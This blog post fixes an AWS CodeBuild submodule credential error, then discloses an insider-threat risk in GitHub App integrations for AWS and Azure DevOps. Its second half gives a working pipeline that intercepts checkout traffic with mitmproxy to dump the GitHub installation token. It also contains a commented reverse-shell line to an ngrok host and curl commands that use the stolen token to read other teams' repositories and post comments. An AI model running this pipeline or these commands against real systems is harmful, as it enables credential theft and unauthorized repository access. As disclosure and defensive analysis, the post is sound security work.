Resolving Undocumented AWS Codebuild Errors and Discussing CI/CD GitHub Integration Security
Resolving an undocumented AWS Codebuild error and describing GitHub App integration security considerations.
- Introduction
- Problem
- Solution
- Caveots / Gotchas with GitHub Integrations
- >> Important section <<
- Leaking GitHub App Token in ADO
- Summary
Introduction
This is a short post on resolving an AWS Codebuild pipeline error. I could not find any references to its solution online so I thought I would post about it.
Problem
Similar to this aws post, we were receiving a submodule authorization error
CLIENT_ERROR: Submodule error authorization failed for primary source and source version
On StackOverfow, this post seemed related that may be worth mentioning: submodule-error-repository-not-found-for-primary-source-and-source-version
Solution
After much troubleshooting.
It seemed the PAT token did not have permission to the submodule. Thus, when we override (2), we would expect the submodule to fetch the submodule with the override credentials. However, the behavior indicates it may have been fetching with the default PAT token credentials.
By setting the default credential to an app that had access to both the source repo and the submodule repos, the pipeline started working.
Caveots / Gotchas with GitHub Integrations
>> Important section <<
When testing the GitHub App connection it was noted there is only one GitHub app per AWS/Github Org integration. Therefore, if we have 2 teams working in AWS and they both need access to GitHub, we create an app and that app has access to Team 1 repos and Team 2 repos. Once we create a connection in AWS, Team 1 can get access to Team 2 repos and visa versa.
This behavior was examined for both AWS and Azure DevOps integrations (< links here point to the respective GitHub integration apps). I can only speculate that this appears with other platform configurations as well. The Azure DevOps docs do seem to indicate there is a set of permissions to configure and go through mapping GitHub permissions to ADO permissions, however, the docs also make this comment about the app having access to all repos.
When we have multiple teams working in an ADO account and we add their repos, we start having cross-team access to repos. An insider threat vector that should be noted as at this point GitHub repo permissions are irrelavent.
We were hoping to split and use different apps for different teams as both a security boundary and also because each app has rate limits; we wanted to ensure one team’s actions did not result in a potential rate limit that affected everyone else.
This configuration is peculiar. GitHub PAT tokens are an alternative but then you have leakable secrets that need to be managed and rotated frequently. Since CI/CD executes code as a service, it should be possible to use custom GitHub apps, however, integration is not as seamless as using the integrated GitHub App for each environment.
An organization needs to weigh pros/cons for each integration as these tradeoffs are not readily apparent at first glance.
Leaking GitHub App Token in ADO
As an example, we will look at how to dump the GitHub Installation [basic] token from an ADO pipeline.
The token can be leaked by creating a GitHub repo with an azure-pipelines.yaml
This pipeline will set the DevOps Agent variables required to send agent requests through a proxy > install mitmproxy & create a certificate > initiate a checkout with the git requests running through the proxy and log them to a file > read the file to stdout
pool:
name: Azure Pipelines
resources:
repositories:
- repository: xyz
type: github
name: mycorp/test-repo1 ## UPDATE THIS TO CURRENT REPO
endpoint: mycorp ## UPDATE THIS TO GITHUB CONNECTION IN AZURE DEVOPS
jobs:
- job: LeakGithubInstallToken
displayName: "Installing mitmproxy and grabbing git requests"
variables:
Agent.ProxyUrl: http://localhost:8888
Agent.SkipCertVal: true
Agent.ClientCert: /home/vsts/.mitmproxy/mitmproxy-ca.pem
steps:
- script: |
git config --global http.sslVerify false
sudo apt update
sudo apt install mitmproxy -y
set -ex
PROXY_PORT=8888
LOG_FILE="/tmp/proxy.log"
PROXY_PID_FILE="/tmp/proxy.pid"
PY_SCRIPT="/tmp/proxy_logger.py"
# Ensure HOME is correctly set (important for mitmproxy certs)
export HOME=$(getent passwd "$(whoami)" | cut -d: -f6)
# Verify mitmdump exists
command -v mitmdump
# Ensure mitmproxy certs are generated
if [ ! -f "$HOME/.mitmproxy/mitmproxy-ca.pem" ]; then
echo "[*] Generating mitmproxy certs..."
mitmdump -p 9999 --ssl-insecure --set block_global=false --quiet &
sleep 2
kill $!
fi
# Write inline Python logger
cat <<'EOF' > "$PY_SCRIPT"
from mitmproxy import http
import base64
def request(flow: http.HTTPFlow) -> None:
auth = flow.request.headers.get("Authorization")
if auth:
encoded = base64.b64encode(f"{auth}".replace("basic ", "").encode()).decode()
with open("/tmp/proxy.log", "a") as f:
f.write("=== AUTHORIZATION HEADER ===\n")
f.write(encoded)
f.write("=============================\n\n")
EOF
# Start mitmdump proxy
mitmdump -p "$PROXY_PORT" --ssl-insecure -s "$PY_SCRIPT" &
echo $! > "$PROXY_PID_FILE"
echo "[*] mitmdump proxy running on port $PROXY_PORT"
echo "[*] Logging to $LOG_FILE"
echo "[*] To stop: kill \$(cat $PROXY_PID_FILE)"
displayName: "Install mitmproxy root CA"
- checkout: xyz
persistCredentials: true
- script: |
# bash -i >& /dev/tcp/8.tcp.ngrok.io/15776 0>&1 # reverse shell for debugging
cat /tmp/proxy.log
echo "Checkouts completed via proxy"
Once the pipeline runs, we can see the CmdLine task output an Authorization Header (base64 encoded so the agent allows printing the value to output). Alternatively, we could have sent this token to an external server if we did not have access to view it in the portal.
ZUMxaFkyTmxjM010ZEc5clpXNDZaMmh6WDAxxYdLakDbmR2VTI1eVNsaHpUMkZtZEd0dFRVMURNR0pWZFdadGNUTnlhWFEzTUE9PQ===============================
We can then use this value to call the GitHub api:
# base64 decode to get the original token (a b64 encoded basic credential)
token=`echo 'ZUMxaFkyTmxjM010ZEc5clpXNDZaMmh6WDAxxYdLakDbmR2VTI1eVNsaHpUMkZtZEd0dFRVMURNR0pWZFdadGNUTnlhWFEzTUE9PQ===============================' | base64 -d`
# Show repos the token can access
page=1
while :; do
result=$(curl -s -H "Authorization: Basic $token" \
-H "Accept: application/vnd.github+json" \
"https://api.github.com/installation/repositories?per_page=100&page=$page")
echo "$result" | jq -r '.repositories[] | "\(.full_name)"'
count=$(echo "$result" | jq '.repositories | length')
[ "$count" -lt 100 ] && break
page=$((page + 1))
done
# read specific file
repo="mycorp/another-repo"
path="README.md"
curl -sL \
-H "Accept: application/vnd.github+json" \
-H "Authorization: Basic $token" \
-H "X-GitHub-Api-Version: 2022-11-28" \
"https://api.github.com/repos/$repo/contents/$path" \
| jq -r '.content' \
| base64 -d
# add comment to an issue
curl -X POST \
-H "Authorization: Basic $token" \
-H "Accept: application/vnd.github+json" \
https://api.github.com/repos/dteenergy/MSUtil/issues/1/comments \
-d '{"body": "Comment text"}'
The token may have limited permissions as it is a temporary token created by the GitHub App and the Azure DevOps backend manages the creation of this temporary token. However, we can clearly access repos which we may normally not be able to see based on our GitHub permissions.
Summary
Undocumented AWS issues aside, CI/CD security is a finicky topic that should include internal threat modeling. When connecting repositories to GitHub App integrations, you should take extra care by separating repos into separate GitHub Orgs or using different means of authenticating the repos. Internal threats are not new, but hopefully with knowledge that 60% of breaches are insider threats, 83% of organizations reporting insider attacks in 2024 and new reports of North Korea infiltrating fortune 500 companies, companies will consider this a very real and serious situation to plan for.